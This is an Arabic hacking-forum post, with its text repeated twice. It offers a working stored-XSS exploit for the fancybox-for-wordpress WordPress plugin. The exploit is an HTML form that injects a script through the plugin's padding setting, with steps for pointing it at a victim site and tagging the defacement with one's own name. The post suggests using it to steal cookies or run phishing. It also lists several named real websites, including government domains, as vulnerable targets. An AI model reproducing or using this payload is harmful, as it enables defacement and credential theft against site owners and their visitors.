hacker@dz
02-19-2015, 01:05 PM
السلام عليكم
قبل ايام تم اكتشاف ثغرة في الاضافة
fancybox-for-wordpress
وهي اضافة مشهورة ومواقع كثيرة تستخدمها
وحسب موقع wordpress.org فانه تم تحميل 600 الف نسخة منها
يعني آلاف المواقع مصابة
المهم الثغرة هي عبارة عن Stored XSS وتسمح لك باضافة اكواد html وجافاسكريبت الى الصفحة الرئيسية في الموقع..
الاستغلال:
<form method="POST" action="http://127.0.0.1/wp-admin/admin-post.php?page=fancybox-for-wordpress">
<input type="text" name="action" value="update">
<input type="text" name="mfbfw[padding]" value="</استبدال script><استبدال script>alert(/Owned by someone/)</استبدال script>">
<input type="submit" value="Send">
</form>
نقوم بتغيير الايبي الى رابط الموقع المصاب
نستبدل Owned by someone الى اسمك مثلا:GOSTEDZ
نفتح مستند نص ننسخ الكود ونحط الكود في المستند ونحفظه بصيغة HTML
وبعد الاستغلال يتم تنفيذ كود الجافاسكريبت على كل زوار الموقع
http://s29.postimg.org/tik17f7xz/Capture.png
وطبعا كل واحد وكيف يتسغل هذه الثغرة مثلا في سرقة الكوكيز او phishing ...الخ
مواقع مصابة:
http://foreverafter.co.il
http://unfolding.co.il
http://www.cws.co.il
http://www.para-dox.co.il
http://www.hotelsblog.co.il
http://www.taal.gov.ph
http://diariodeviaje.pakapaka.gob.ar
http://loko.pz.gov.ua
* الثغرة ليست من اكتشافي وايضا هي ليست منشورة في مواقع الحماية والكثير لا يعلم عنها...
الثغرة : http://1337day.com/exploit/23294 ====> 16/02/2015
قبل ايام تم اكتشاف ثغرة في الاضافة
fancybox-for-wordpress
وهي اضافة مشهورة ومواقع كثيرة تستخدمها
وحسب موقع wordpress.org فانه تم تحميل 600 الف نسخة منها
يعني آلاف المواقع مصابة
المهم الثغرة هي عبارة عن Stored XSS وتسمح لك باضافة اكواد html وجافاسكريبت الى الصفحة الرئيسية في الموقع..
الاستغلال:
<form method="POST" action="http://127.0.0.1/wp-admin/admin-post.php?page=fancybox-for-wordpress">
<input type="text" name="action" value="update">
<input type="text" name="mfbfw[padding]" value="</استبدال script><استبدال script>alert(/Owned by someone/)</استبدال script>">
<input type="submit" value="Send">
</form>
نقوم بتغيير الايبي الى رابط الموقع المصاب
نستبدل Owned by someone الى اسمك مثلا:GOSTEDZ
نفتح مستند نص ننسخ الكود ونحط الكود في المستند ونحفظه بصيغة HTML
وبعد الاستغلال يتم تنفيذ كود الجافاسكريبت على كل زوار الموقع
http://s29.postimg.org/tik17f7xz/Capture.png
وطبعا كل واحد وكيف يتسغل هذه الثغرة مثلا في سرقة الكوكيز او phishing ...الخ
مواقع مصابة:
http://foreverafter.co.il
http://unfolding.co.il
http://www.cws.co.il
http://www.para-dox.co.il
http://www.hotelsblog.co.il
http://www.taal.gov.ph
http://diariodeviaje.pakapaka.gob.ar
http://loko.pz.gov.ua
* الثغرة ليست من اكتشافي وايضا هي ليست منشورة في مواقع الحماية والكثير لا يعلم عنها...
الثغرة : http://1337day.com/exploit/23294 ====> 16/02/2015